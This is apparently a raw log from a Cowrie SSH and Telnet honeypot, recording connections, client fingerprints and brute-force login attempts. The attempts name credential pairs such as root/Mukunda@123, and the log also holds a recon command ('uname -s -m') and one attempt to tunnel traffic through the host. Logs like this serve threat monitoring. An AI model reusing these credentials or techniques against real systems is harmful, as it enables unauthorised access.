{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:28:24.946433Z","src_ip":"212.227.125.160","session":"89b9ec697c48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27424,"dst_ip":"1.2.3.4","dst_port":22,"session":"abf6a2af7089","protocol":"ssh","message":"New connection: 212.227.125.160:27424 (1.2.3.4:22) [session: abf6a2af7089]","sensor":"my-vps","timestamp":"2025-08-26T14:28:25.446269Z"}
{"eventid":"cowrie.client.version","version":"USER anonymous","message":"Remote SSH version: USER anonymous","sensor":"my-vps","timestamp":"2025-08-26T14:28:25.447253Z","src_ip":"212.227.125.160","session":"abf6a2af7089"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:28:25.448843Z","src_ip":"212.227.125.160","session":"abf6a2af7089"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:28:56.130714Z","src_ip":"212.227.125.160","session":"9a0b9b055d65"}
{"eventid":"cowrie.session.connect","src_ip":"104.28.211.189","src_port":19315,"dst_ip":"1.2.3.4","dst_port":22,"session":"e765cd8d9102","protocol":"ssh","message":"New connection: 104.28.211.189:19315 (1.2.3.4:22) [session: e765cd8d9102]","sensor":"my-vps","timestamp":"2025-08-26T14:29:23.761565Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:29:23.801260Z","src_ip":"104.28.211.189","session":"e765cd8d9102"}
{"eventid":"cowrie.session.connect","src_ip":"104.28.211.189","src_port":18950,"dst_ip":"1.2.3.4","dst_port":22,"session":"741c701340f4","protocol":"ssh","message":"New connection: 104.28.211.189:18950 (1.2.3.4:22) [session: 741c701340f4]","sensor":"my-vps","timestamp":"2025-08-26T14:29:23.821022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:29:23.832438Z","src_ip":"104.28.211.189","session":"741c701340f4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T14:29:23.853196Z","src_ip":"104.28.211.189","session":"741c701340f4"}
{"eventid":"cowrie.login.success","username":"root","password":"------fuck------","message":"login attempt [root/------fuck------] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:29:24.032244Z","src_ip":"104.28.211.189","session":"741c701340f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:29:24.143194Z","src_ip":"104.28.211.189","session":"741c701340f4"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-26T14:29:24.143868Z","src_ip":"104.28.211.189","session":"741c701340f4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:29:24.185522Z","src_ip":"104.28.211.189","session":"741c701340f4"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:29:24.186578Z","src_ip":"104.28.211.189","session":"741c701340f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58918,"dst_ip":"1.2.3.4","dst_port":23,"session":"a8a13768c886","protocol":"telnet","message":"New connection: 212.227.125.160:58918 (1.2.3.4:23) [session: a8a13768c886]","sensor":"my-vps","timestamp":"2025-08-26T14:29:40.748031Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52810,"dst_ip":"1.2.3.4","dst_port":22,"session":"16f7e7406990","protocol":"ssh","message":"New connection: 217.72.205.35:52810 (1.2.3.4:22) [session: 16f7e7406990]","sensor":"my-vps","timestamp":"2025-08-26T14:30:10.533611Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:30:10.534693Z","src_ip":"217.72.205.35","session":"16f7e7406990"}
{"eventid":"cowrie.session.closed","duration":30.60722303390503,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:30:11.355186Z","src_ip":"212.227.125.160","session":"a8a13768c886"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44146,"dst_ip":"1.2.3.4","dst_port":22,"session":"2014b28b5947","protocol":"ssh","message":"New connection: 212.227.235.229:44146 (1.2.3.4:22) [session: 2014b28b5947]","sensor":"my-vps","timestamp":"2025-08-26T14:30:44.586013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T14:30:44.587072Z","src_ip":"212.227.235.229","session":"2014b28b5947"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T14:30:44.691179Z","src_ip":"212.227.235.229","session":"2014b28b5947"}
{"eventid":"cowrie.login.failed","username":"admin","password":"reviews","message":"login attempt [admin/reviews] failed","sensor":"my-vps","timestamp":"2025-08-26T14:30:45.194150Z","src_ip":"212.227.235.229","session":"2014b28b5947"}
{"eventid":"cowrie.login.failed","username":"admin","password":"renee1","message":"login attempt [admin/renee1] failed","sensor":"my-vps","timestamp":"2025-08-26T14:30:46.301294Z","src_ip":"212.227.235.229","session":"2014b28b5947"}
{"eventid":"cowrie.login.failed","username":"admin","password":"reindeer","message":"login attempt [admin/reindeer] failed","sensor":"my-vps","timestamp":"2025-08-26T14:30:47.407887Z","src_ip":"212.227.235.229","session":"2014b28b5947"}
{"eventid":"cowrie.login.failed","username":"admin","password":"regional","message":"login attempt [admin/regional] failed","sensor":"my-vps","timestamp":"2025-08-26T14:30:48.514956Z","src_ip":"212.227.235.229","session":"2014b28b5947"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rebbyt34","message":"login attempt [admin/rebbyt34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:30:49.621383Z","src_ip":"212.227.235.229","session":"2014b28b5947"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:30:50.728680Z","src_ip":"212.227.235.229","session":"2014b28b5947"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44740,"dst_ip":"1.2.3.4","dst_port":22,"session":"624719a1018a","protocol":"ssh","message":"New connection: 212.227.235.229:44740 (1.2.3.4:22) [session: 624719a1018a]","sensor":"my-vps","timestamp":"2025-08-26T14:31:00.820779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:31:01.369018Z","src_ip":"212.227.235.229","session":"624719a1018a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T14:31:01.370032Z","src_ip":"212.227.235.229","session":"624719a1018a"}
{"eventid":"cowrie.login.success","username":"root","password":"Mukunda@123","message":"login attempt [root/Mukunda@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:31:03.859141Z","src_ip":"212.227.235.229","session":"624719a1018a"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:31:04.939462Z","src_ip":"212.227.235.229","session":"624719a1018a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:31:12.581501Z","src_ip":"212.227.235.229","session":"5dfb79a9ce25"}
{"eventid":"cowrie.session.closed","duration":180.2302749156952,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:31:12.586368Z","src_ip":"212.227.235.229","session":"5dfb79a9ce25"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":60040,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c83819b159c","protocol":"ssh","message":"New connection: 45.88.8.186:60040 (1.2.3.4:22) [session: 6c83819b159c]","sensor":"my-vps","timestamp":"2025-08-26T14:34:23.052704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:34:23.861372Z","src_ip":"45.88.8.186","session":"6c83819b159c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T14:34:23.862002Z","src_ip":"45.88.8.186","session":"6c83819b159c"}
{"eventid":"cowrie.login.success","username":"root","password":"amir1369","message":"login attempt [root/amir1369] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:34:27.422728Z","src_ip":"45.88.8.186","session":"6c83819b159c"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:34:28.368325Z","src_ip":"45.88.8.186","session":"6c83819b159c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43567,"dst_ip":"1.2.3.4","dst_port":23,"session":"6ca4835c44f4","protocol":"telnet","message":"New connection: 212.227.235.229:43567 (1.2.3.4:23) [session: 6ca4835c44f4]","sensor":"my-vps","timestamp":"2025-08-26T14:35:13.568834Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21631,"dst_ip":"1.2.3.4","dst_port":22,"session":"256de295c99d","protocol":"ssh","message":"New connection: 212.227.125.160:21631 (1.2.3.4:22) [session: 256de295c99d]","sensor":"my-vps","timestamp":"2025-08-26T14:35:17.340948Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:35:17.342155Z","src_ip":"212.227.125.160","session":"256de295c99d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21884,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcca97f2b03f","protocol":"ssh","message":"New connection: 212.227.125.160:21884 (1.2.3.4:22) [session: fcca97f2b03f]","sensor":"my-vps","timestamp":"2025-08-26T14:35:17.458169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:35:17.459381Z","src_ip":"212.227.125.160","session":"fcca97f2b03f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T14:35:17.575319Z","src_ip":"212.227.125.160","session":"fcca97f2b03f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:35:17.925689Z","src_ip":"212.227.125.160","session":"fcca97f2b03f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T14:35:18.043420Z","session":"fcca97f2b03f"}
{"eventid":"cowrie.session.closed","duration":38.60679745674133,"message":"Connection lost after 38 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:35:52.175557Z","src_ip":"212.227.235.229","session":"6ca4835c44f4"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:36:27.458339Z","src_ip":"212.227.125.160","session":"fcca97f2b03f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62568,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebfbad7fff18","protocol":"ssh","message":"New connection: 217.72.205.35:62568 (1.2.3.4:22) [session: ebfbad7fff18]","sensor":"my-vps","timestamp":"2025-08-26T14:36:42.624780Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:36:42.626084Z","src_ip":"217.72.205.35","session":"ebfbad7fff18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49590,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ac740c9e533","protocol":"telnet","message":"New connection: 212.227.125.160:49590 (1.2.3.4:23) [session: 8ac740c9e533]","sensor":"my-vps","timestamp":"2025-08-26T14:37:04.608357Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60172,"dst_ip":"1.2.3.4","dst_port":23,"session":"1318e86cfbaa","protocol":"telnet","message":"New connection: 212.227.125.160:60172 (1.2.3.4:23) [session: 1318e86cfbaa]","sensor":"my-vps","timestamp":"2025-08-26T14:37:07.813809Z"}
{"eventid":"cowrie.session.closed","duration":30.79330587387085,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:37:35.401599Z","src_ip":"212.227.125.160","session":"8ac740c9e533"}
{"eventid":"cowrie.session.closed","duration":31.52671241760254,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:37:39.340447Z","src_ip":"212.227.125.160","session":"1318e86cfbaa"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":48598,"dst_ip":"1.2.3.4","dst_port":22,"session":"7100d1eb0ae9","protocol":"ssh","message":"New connection: 193.32.162.145:48598 (1.2.3.4:22) [session: 7100d1eb0ae9]","sensor":"my-vps","timestamp":"2025-08-26T14:40:07.930026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:40:07.931216Z","src_ip":"193.32.162.145","session":"7100d1eb0ae9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T14:40:07.960957Z","src_ip":"193.32.162.145","session":"7100d1eb0ae9"}
{"eventid":"cowrie.login.failed","username":"solana","password":"test","message":"login attempt [solana/test] failed","sensor":"my-vps","timestamp":"2025-08-26T14:40:08.054780Z","src_ip":"193.32.162.145","session":"7100d1eb0ae9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:40:09.086966Z","src_ip":"193.32.162.145","session":"7100d1eb0ae9"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":58536,"dst_ip":"1.2.3.4","dst_port":22,"session":"58b39d28cbe7","protocol":"ssh","message":"New connection: 45.88.8.215:58536 (1.2.3.4:22) [session: 58b39d28cbe7]","sensor":"my-vps","timestamp":"2025-08-26T14:40:50.584410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:40:50.936276Z","src_ip":"45.88.8.215","session":"58b39d28cbe7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T14:40:50.936983Z","src_ip":"45.88.8.215","session":"58b39d28cbe7"}
{"eventid":"cowrie.login.success","username":"root","password":"Mukunda@123","message":"login attempt [root/Mukunda@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:40:53.649500Z","src_ip":"45.88.8.215","session":"58b39d28cbe7"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:40:54.131182Z","src_ip":"45.88.8.215","session":"58b39d28cbe7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16954,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4130df6f706","protocol":"ssh","message":"New connection: 213.209.150.239:16954 (1.2.3.4:22) [session: f4130df6f706]","sensor":"my-vps","timestamp":"2025-08-26T14:41:20.200466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:41:20.201792Z","src_ip":"213.209.150.239","session":"f4130df6f706"}
